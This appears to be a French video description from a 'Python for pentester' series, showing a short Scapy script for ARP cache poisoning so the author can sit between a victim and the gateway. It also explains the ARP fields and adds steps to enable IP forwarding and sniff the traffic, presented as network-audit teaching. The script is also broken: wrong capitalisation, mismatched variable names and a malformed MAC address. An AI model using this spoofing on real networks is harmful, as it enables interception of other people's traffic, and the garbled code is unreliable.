SALTINBANK - PYTHON FOR PENTESTER : SCAPY PYTHON pour faire un pondeuse ARP pour scanner le REZO !
Tout simple je veux à partir de mon réseau (classe C) pouvoir pinguer les 256 machines sur le CIDR (/24) au niveau du réseau ...
Je pourrais jouer sur les interfaces (WLAN, ETH ou TUN) et la variable IP_RANGE (pour attaquer d'autres réseaux CLASSES A/B/C) ...
=============================================================================
Ou en offensif : Nous aurons besoin d’effectuer un MITM (Man in the Middle, homme du milieu) pour tester le réseau dans un audit. Il existe bien sûr des logiciels spécialisés, mais nous avons la possibilité de le faire avec Scapy. Cette technique du MITM passe par de l’ARP cache poisoning.
=========================================================================
Lors d’une attaque de type ARP poisoning, le pirate va se glisser entre les données envoyées par l’utilisateur et le routeur.
---------------------------------------------------------------------------------------------------------------------------------------------------
From scapy.all import *
import time
op=1 # OP code 1 pour requête ARP
Victim="10.X.X.X" # Remplacer par IP victime
Spoof="10.X.X.X" # Remplacer par IP passerelle (gateway)
mac="FF:FF:FF:FF:FF:FF:FF" # Remplacer par MAC de l'attaquant
Arp=ARP(op=op, psrc=spoof, pdst=vctim, hwdst=mac)
While 1 :
send(arp)
time.sleep(2)
------------------------------------------------------------------------------------------------------------------------------------------------
Il nous faut utiliser le protocole ARP, d’où l’utilisation de la fonction ARP() aves les paramètres suivants :
requête ARP(1)
src: adresse MAC de source.
dst : adresse MAC de destination .
hwsrc : adresse MAC que vous voulez mettre dans la table ARP distante (attaquant).
pdst : adresse IP de la machine distante dont vous voulez infecter la table ARP (victime).
psrc : adresse IP de la passerelle.
========================================================================
Il nous faut maintenant mettre notre machine en mode forward IP (/proc/sys/net/ipv4/ip_forward) et lancer le script ci-dessus ainsi qu’un sniffer (en Scapy ou directement Wireshark) pour capturer les paquets.
=======================================================================
PYTHON : rien ne l'arrête ...
=========================================================================
Thanks for watching!
Благодарю за просмотр!
Kiitos katsomisesta
Danke fürs Zuschauen!
感谢您观看
Merci d'avoir regardé
Obrigado por assistir
دیکھنے کے لیے شکریہ
देखने के लिए धन्यवाद
Grazie per la visione
Gracias por ver
شكرا للمشاهدة
=========================================================================